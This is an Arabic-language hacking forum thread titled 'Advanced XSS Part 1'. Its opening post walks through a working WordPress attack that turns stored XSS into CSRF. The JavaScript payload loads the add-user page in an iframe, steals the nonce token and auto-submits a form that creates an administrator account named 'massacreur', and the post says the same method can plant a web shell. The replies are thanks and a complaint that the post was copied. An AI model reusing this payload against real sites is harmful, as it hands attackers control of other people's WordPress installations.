الوسوم:
حالة الموضوع:
مغلق
  1. a7mdrat

    a7mdrat Developer

    الأنتساب:
    ‏7 أغسطس 2012
    المشاركات:
    31
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    [​IMG]
    الموضوع عن الاستغلال المتفدم لثغرات xss
    و عدم الاكتفاء بالطريق التقليدية لسحب الكوكيز

    نوع من انواع الاستغلال المتقدم هو التحويل من xss الى CSRF

    و المقصود هنا تقدر تعمل اي شئ كانك داخل اللوحة

    و للتجرية اخترت سكربت وردبريس

    لان اغلب الناس لما تجد xss تقول ثغرة مالها لزمة


    xss اخطر انواع الثغرات خصوصا stored

    اذا ان الادمن نفسه ينفذ الكود في متصفحه
    يعني تخطي مشاكل الجدار الناري ......

    نترك الكلام و نأتي للتطبيق

    موضوع اليوم عن add admin wordpress via xss

    اولا ناتي الى طريقة كتابة الاستغلال

    هناك عدة طريق نشرحها وحدة وحدة

    الطريقة الاولى:
    0-امور مساعدة
    1- قرات التوكن عن طريق xss
    2- انشاء فورم عن طريق javascript و التنفيذ


    0-
    ننصب السكربت على المحلي


    http://127.0.0.1/wordpress/

    ندخل اللوحة عادي
    ثم ننشأ ملف html ونكتب الاستغلال داخله
    اول شئ وهو عمل iframe يسحب صفحة اضافة الادمن وهي على المسار

    http://127.0.0.1/wordpress/wp-admin/user-new.php
    كود PHP:
    <script>
      
    document.writeln('<iframe id="iframe" onload="loadz()" src="http://127.0.0.1/wordpress/wp-admin/user-new.php"></iframe>');  
    </script>

    ثم حفظ الملف باسم massacreur.html
    بدخل الملف

    http://127.0.0.1/massacreur.html

    1- قرات التوكن عن طريق xss

    الان نبحث على input التوكن
    كود PHP:
    <input type="hidden" id="_wpnonce_create-user" name="_wpnonce_create-user" value="79b9646aef" />

    كود جافا سكربت بسيط لسحب التوكين

    كود PHP:
    <script>
    document.writeln('<iframe id="iframe" onload="loadz()" src="http://127.0.0.1/wordpress/wp-admin/user-new.php"></iframe>');  
     function 
    loadz() {
      eval (
    "var wptoken=document.getElementById('iframe').contentDocument.getElementsByTagName('input')[1].value"); 
    alertwptoken); 
    }
     
    </script>
    الان معنا التوكن

    2- انشاء فورم عن طريق javascript و التنفيذ

    نقوم نتكوين form اضافة ادمين + ارسال

    نسحب form صفحة اضافة ادمن ثم ننزع الاشياء الغير مهمة المتعلقة بال css و structure de la page html

    نترك الاساسي فقط

    يصبح هكذا

    massacreur.html
    كود PHP:
    <script>
      
    document.writeln('<iframe id="iframe" onload="loadz()" src="http://127.0.0.1/wordpress/wp-admin/user-new.php"></iframe>');  
      function 
    loadz() {
      eval (
    "var wptoken=document.getElementById('iframe').contentDocument.getElementsByTagName('input')[1].value"); 
      
    document.writeln('<iframe><form id="bd" action="http://127.0.0.1/wordpress/wp-admin/user-new.php" method="post" name="bd" id="createuser" class="validate">');
      
    document.writeln('<input name="action" type="text" value="createuser" />');
      
    document.writeln('<input type="text" id="_wpnonce_create-user" name="_wpnonce_create-user" value="'+wptoken+'" />'); 
      
    document.writeln('<input type="text" name="_wp_http_referer" value="http://127.0.0.1/wordpress/wp-admin/user-new.php" />'); 
      
    document.writeln('<input name="user_login" type="text" id="user_login" value="massacreur" aria-required="true" />');
      
    document.writeln('<input name="email" type="text" id="email" value="[email protected]" />');
      
    document.writeln('<input name="last_name" type="text" id="last_name" value="massacreur" /></td>'); 
      
    document.writeln('<input name="url" type="text" id="url" class="code" value="massacreur" />');
      
    document.writeln('<input class="text" value=" " />');
      
    document.writeln('<input name="pass1" type="text" id="pass1" autocomplete="off" value="toxico" />');
      
    document.writeln('<input name="pass2" type="text" id="pass2" autocomplete="off" value="toxico" />');
      
    document.writeln('<input type="text" value="send_password" name="send_password" id="send_password"  />'); 
      
    document.writeln('<input type="text"  name="role" id="role"  />'); 
      
    document.writeln('<input name="role" id="role" value="administrator">'); 
      
    document.writeln('<input id="submit" class="button button-primary" type="submit" value="Add New User " name="submit">');
      
    document.writeln('</form>'); 
      
    document.forms[0].submit.click(); 
      
      }  
    </script>
    وفي الاخير

    نحذف

    <script></script>

    ونغير الامتداد الى

    .js

    هذه احد الطرق

    هناك طرق اكثر فعالية
    سوف اشرحها في يوم من الايام ان شاء الله


    يمكنك اضافة ادمين او رفع شل من كانك داخل اللوحة
    اسئلة و اضافات و نقاشات جادة لوسمحتم
    الطريقة ليست بالجديد لكن لم اجد لها شروحات منقول للامانه bye1~`

     
  2. مخابرات الهكر

    مخابرات الهكر Developer

    الأنتساب:
    ‏19 يوليو 2012
    المشاركات:
    67
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    ksa
    رد: Advanced XSS Part 1

    جزاكم الله خيراً ,أخي العزيز

    موضوع رائع
     
  3. D 1 r k

    D 1 r k DeveloPer Plus

    الأنتساب:
    ‏9 ابريل 2012
    المشاركات:
    141
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    18
    الوظيفة:
    Currently Student
    الإقامة:
    United States
    رد: Advanced XSS Part 1

    بارك الله فيك أخى الغالى
     
  4. Dear.DZ

    Dear.DZ Developer

    الأنتساب:
    ‏22 مايو 2012
    المشاركات:
    18
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    Algeria
    رد: Advanced XSS Part 1

    الله يبارك بيك اخي الغالي
     
  5. T H E P U N I S H E R

    T H E P U N I S H E R .:: فريــق الدعم الفني ::. مساعد مشرف

    الأنتساب:
    ‏29 مارس 2012
    المشاركات:
    316
    الإعجابات المتلقاة:
    1,241
    نقاط الجائزة:
    93
    الإقامة:
    Egypt (●̪•)
    رد: Advanced XSS Part 1

    بآرك الله فيك آخي الغالي​
     
  6. massacreur

    massacreur Developer

    الأنتساب:
    ‏24 ابريل 2013
    المشاركات:
    3
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: Advanced XSS Part 1

    قبل لا تنقل الموضوع حرفيا المرة الجاية قم بالاستاذان اولا
    يخي عباد يخي
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة